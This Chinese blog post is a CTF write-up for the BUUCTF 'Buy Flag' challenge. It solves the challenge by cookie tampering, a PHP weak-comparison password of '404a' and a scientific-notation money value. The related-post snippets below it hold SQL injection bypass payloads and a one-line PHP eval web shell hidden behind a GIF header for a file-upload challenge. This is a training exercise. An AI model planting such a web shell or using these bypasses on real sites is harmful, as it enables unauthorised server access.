[极客大挑战 2019]Buy Flag1(BUUCTF)

已于 2022-12-30 18:39:02 修改
阅读量1k 收藏 1
点赞数 2
分类专栏: 网络攻防 网页 题解 文章标签: php
于 2022-12-29 16:08:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/HackerQY/article/details/128483025
版权

前言:

这篇文章还是是为了帮助一些

像我这样的菜鸟

找到简单的题解

题目描述

解题工具:

我爱用edit this cookie2和hackerbar,

当然也可以burpsuite和fiddler抓包

解题过程:

看到他说flag要100000000 MONEY,

还要是Cuit's students,

就知道肯定是cookie在捣鬼(一般身份验证就是cookie)

打开edit this cookie2

发现user值为0,果断加他改为1(要问为什么。。。直觉!!!)

看到多了一行字,要输密码

可是找来找去没地方输入,get也不行,只能用hackerbar来postdata了 

现在问题来了,密码是啥?

在源代码中找到

分析一下要post password和money

密码可以为"404a"

php弱类型比较:404==‘404xxxxx’

post后又多了一句话

要付钱,第六感告诉我money肯定是一个变量(以前写python游戏金钱是都用money变量)

post一下money

发现又多了一句话说money太长了

这个简单,用科学计数法表示即可

money=1e9

成功获得flag

flag{e161c567-ba12-4cbf-8ff8-acefc79fa369}

完成

[极客挑战 2019]BuyFlag 1
qq_43618536的博客
07-02 4055
BUUCTF的[极客挑战 2019]BuyFlag 1
[网络安全 CTF] BUUCTF极客挑战2019PHP解题详析(Dirsearch使用实例+php反序列化)_[极客挑战 2019]php
2401_84971538的博客
05-13 764
自我介绍一下,小编13年上海交毕业,曾经在小公司待过,也去过华为、OPPO等厂,18年进入阿里一直到现在。深知多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
BUUCTF [极客挑战 2019]BuyFlag1
lzu_lfl的博客
09-12 2329
BUUCTF [极客挑战 2019]BuyFlag1_WP
[BUUCTF][极客挑战 2019]PHP
朋克归零膏的博客
10-17 517
反序列化漏洞。
BUUCTF之[极客挑战 2019]BabySQL 解决方法
weixin_44632787的博客
06-17 2048
BUUCTF之[极客挑战 2019]BabySQL 解决方法 启动我们的挑战项目 emmmmm这是第三个SQL注入,应该难度又提高了一些。先试试我们的万能密码:1’ or 1=1 # 不行,报错了。而且我也看不出报错的信息是什么 然后返回前面的题目看看提示信息,觉得可能这题是加了一些过滤信息 所以我们试试双写看看能不能绕过防御,并且把最后面的 # 号改成 %23。 所以我们的payload为:1’ oorr 1=1 %23 发现可以获取到信息,说明我们这个方法是正确的! 然后我们再进行用ord
[BUUCTF][极客挑战 2019]Http
朋克归零膏的博客
10-13 844
在CTF中修改http头的操作常有BUUCFT另一题,常用到的值User-AgentReferer。
BUUCTF——[极客挑战 2019]PHP
doraemon12345的博客
06-07 459
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
Buuctf [极客挑战 2019]BuyFlag1 WP解析
qq_60115503的博客
11-07 1451
源代码要求我们必须是cuit的学生才可以登录,发现cookie:user=0怀疑是身份判断的位置,布尔值0是false 1为true,修改数据包发送发现要求我们这里输入密码。提示我,1Nember lenth is too long数字太长了,我们这里使用科学计数法将100000000改成10e9。用post方法发送一个名为password的变量,设置password=404a任何字母都可以。我们通过burpsuite将get包修改为post包。点击change body encoding。
BUUCTF:[极客挑战 2019]BuyFlag1
weixin_74410605的博客
08-06 614
如下图,将数据包get传参改为post传参。cookie代表身份标识,在编程中0代表假,1代表真, 所以猜测这里的user对应的数值代表是不是CUIT学生。发现页面提示说必须是CUIT学生且答出正确的password才能买flag,所以抓个包看看。还需要money,所以输入money=100000000 ,但是如下图显示number太长。如下图,说明要先修改传参方式再进行password传值。如下图,将user改成1,显示身份正确。点击进入pay.php页面,如下图。首先打开靶场页面如下。
[极客挑战 2019]BuyFlag1
cuddlylm的博客
05-12 701
[极客挑战 2019]BuyFlag1 考点:php弱类型比较,科学计数法绕过 源代码提示 抓包 在Request请求中,Cookie: user=0,这里是身份判断的位置,在布尔值中0为false,1为true,我们将其改为Cookie: user=1以通过身份验证。 之后post请求传上两个参数就行 其中password参数要求不能数字,利用php的弱类型比较,用404a或者404%20可以代替404,而且不会被认为是数字 money参数当传值一亿的时候会提示数字太长,可以用科学计数法绕过:1e9
BUUCTF-[极客挑战 2019]BuyFlag1
Monica的博客
10-06 382
目录 题目 知识点 题目 打开页面,没发现什么,查看源代码还是没啥发现,试试抓包 这里cookie中有个user=0,修改为1,页面没变化,但应该是有用的,可能用处不在这里 最后回到页面上: 经过一番点击,查看,在右上角发现一个MENU,查看PAYFLAG, 提示说要给100000000(1亿),然后又说必须为CUIT的学生才能买,而且要输入正确的password。没找到输入点,查看源代码,发现注释代码: if (isset($_POST['password'])) { ..
buuctf [极客挑战 2019]BuyFlag1
uihijio的博客
02-23 786
buuctf [极客挑战 2019]BuyFlag1 打开之后界面是 查看源码有两个超链接 进入pay.php之后 页面显示有三个条件 students,100000000,password 查看源码会发现有提示 用post提交抓包 绕过第一个student,这个有点像逻辑漏洞,将cookie中的user=0修改1之后就能绕过 如下图 绕password 由于是==可以直接将404修改成404a就可以绕过 这是前两个条件都满足了,最后一个金额不满足,思路是将金额用科学计数法来绕过 总结:
BUUCTF——[极客挑战2019]BuyFlag1
weixin_62248541的博客
11-27 525
BUUCTF——[极客挑战2019]BuyFlag1
buuctf [极客挑战 2019]Upload 1
最新发布
02-07
### 关于 BUUCTF 极客挑战 2019 中 Upload 1 题目分析 #### 背景介绍 BUUCTF 是一个知名的网络安全竞赛平台,其中的极客挑战系列题目涵盖了多种安全漏洞利用技巧。Upload 1 属于文件上传类题目,在这类题目中通常会涉及到服务器端对于上传文件类型的验证机制以及可能存在的绕过方法。 #### 文件上传漏洞原理 当 Web 应用程序允许用户上传文件时,如果对上传的内容缺乏严格的安全检查,则可能导致攻击者能够上传恶意脚本并执行任意代码。常见的防御措施包括但不限于 MIME 类型检测、扩展名过滤等[^1]。 #### 解题思路 针对此题目的具体实现方式可以归纳为以下几个方面: - **MIME 类型伪造** PHP 使用 `$_FILES` 数组来处理上传的数据,默认情况下仅依赖客户端提供的 Content-Type 头部信息判断文件类型。然而这些头部是可以被轻易篡改的。因此可以通过修改 HTTP 请求中的相应部分使服务端误认为所提交的是合法图片而非其他形式的可执行文件。 - **PHP 后门植入** 利用上述手段成功上传 .php 结尾或其他能被执行解释器解析运行的文件之后,便可以在该文件内嵌入一段用于远程控制目标主机的小段落,比如一句话木马: ```php <?php @eval($_POST['cmd']);?> ``` - **绕过白名单限制** 如果存在基于文件头特征码(magic number)或者图像尺寸小等方面更严格的校验逻辑的话,那么就需要寻找特定格式下既满足条件又隐藏有潜在威胁特性的样本作为载体;或者是探索是否有其它途径可以直接影响到最终保存路径从而规避掉这部分审核流程。 #### 实际操作案例展示 假设当前环境已经确认支持 GIF89a 开始标记并且不会因为后续附加内容而报错的情况下,我们可以构造这样一个混合体——即所谓的“GIFAR”(Gif+Jar) 攻击向量: ```gif GIF89a; <?php @eval($_POST['cmd']);?> ``` 将其命名为 `.jpg.php` 或类似的双后缀命名模式尝试突破单纯的字符串匹配规则限制,并通过浏览器访问触发反序列化过程完成提权动作获取 shell 访问权限。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值